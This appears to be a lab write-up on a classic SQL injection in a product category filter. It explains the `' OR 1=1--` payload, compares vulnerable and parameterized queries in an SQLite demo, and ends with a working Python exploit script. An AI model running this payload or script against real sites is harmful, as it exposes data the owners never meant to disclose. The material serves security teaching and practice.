SQLi Lab 1
Exploiting a basic SQL injection vulnerability to retrieve hidden data.
SQL Injection in WHERE Clause Reveals Hidden Products
In this lab, I explored how a simple SQL injection (SQLi) vulnerability in the WHERE clause of an SQL query can lead to information disclosure. By injecting the classic `' OR 1=1--` payload into a URL parameter, I was able to bypass the category filter and retrieve every record from the products table, including entries the application normally hides. Despite its simplicity, this technique is highly effective whenever user input is concatenated into a query instead of being passed as a bound parameter.

This exercise reinforced how even the most basic SQLi attack vectors can severely undermine application logic, especially in web apps that embed input directly into database queries. It is a reminder that developers must use parameterized queries (prepared statements) or ORM-based access so that user input is always treated as data, never as SQL syntax.
How the Exploit Works
- The app filters products based on the `category` parameter in the URL.
- This value is directly embedded into the SQL `WHERE` clause.
- No sanitization or parameterization is performed.
- The injected payload `' OR 1=1--` forces the condition to always evaluate true; the `--` comments out the rest of the original clause.
- The server responds with all products in the database, including the ones that are normally hidden.
- The script confirms success by searching for a known product name in the response.
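As an added illustration (not part of the original lab or of the exploit script), the following self-contained Python model shows the vulnerable filter next to its parameterized fix. It uses an in-memory SQLite table with a constructed product list: only the product name "Folding Gadgets" comes from the script above; the other product names, the table layout and the `released` flag that hides unreleased items are assumptions. Running it shows how the `' OR 1=1--` payload rewrites the query text and why a bound parameter is unaffected.

```python
import sqlite3

# Constructed sample catalogue. released=0 marks items the shop should never show.
# "Folding Gadgets" is the product the lab script looks for; the rest are made up.
SAMPLE_PRODUCTS = [
    ("Folding Gadgets", "Gifts", 1),
    ("Giant Pillow Thing", "Gifts", 0),
    ("Eco Boat", "Lifestyle", 1),
    ("Unreleased Prototype", "Lifestyle", 0),
]

PAYLOAD = "' OR 1=1--"  # the payload used in the lab, URL-decoded


def make_db():
    """Build an in-memory SQLite database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def build_vulnerable_sql(category):
    """Return the SQL text the vulnerable app would execute: input is concatenated."""
    return (
        "SELECT name FROM products WHERE category = '" + category + "'"
        " AND released = 1"
    )


def filter_vulnerable(conn, category):
    """Vulnerable filter: the category value becomes part of the SQL syntax."""
    return [row[0] for row in conn.execute(build_vulnerable_sql(category))]


def filter_parameterized(conn, category):
    """Fixed filter: the category value is bound as data via a placeholder."""
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    conn = make_db()
    print("Honest request, vulnerable code :", filter_vulnerable(conn, "Gifts"))
    print("Honest request, parameterized   :", filter_parameterized(conn, "Gifts"))
    print("Query text with payload         :", build_vulnerable_sql(PAYLOAD))
    # The comment marker swallows "AND released = 1", so hidden rows leak.
    print("Payload, vulnerable code        :", filter_vulnerable(conn, PAYLOAD))
    # With a bound parameter the payload is just a category name that matches nothing.
    print("Payload, parameterized          :", filter_parameterized(conn, PAYLOAD))
```

The printed query text makes the mechanism visible: the single quote in the payload closes the string literal, `OR 1=1` makes the predicate universally true, and `--` turns the `AND released = 1` guard into a comment. The parameterized version never splices the input into the statement, so the same string is compared as an ordinary category value and returns nothing.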
Usage

```bash
python3 exploit.py https://<your-lab-id>.web-security-academy.net
```
Exploit

```python
import requests
import sys
import urllib3

# The lab uses a self-signed certificate; silence the warning that verify=False produces.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route traffic through a local intercepting proxy (e.g. Burp on 8080) to inspect requests.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def exploit_sqli(url, payload):
    """Send the payload in the category parameter and check for a known product name."""
    uri = '/filter?category='
    r = requests.get(url + uri + payload, verify=False, proxies=proxies)
    # "Folding Gadgets" is a product that is hidden unless the WHERE clause is bypassed.
    if "Folding Gadgets" in r.text:
        return True
    else:
        return False


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        # URL-encoded form of ' OR 1=1-- (plus signs stand for spaces)
        payload = "'+OR+1=1--"
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)

    if exploit_sqli(url, payload):
        print("[+] SQL injection successful!")
    else:
        print("[-] SQL injection unsuccessful")
```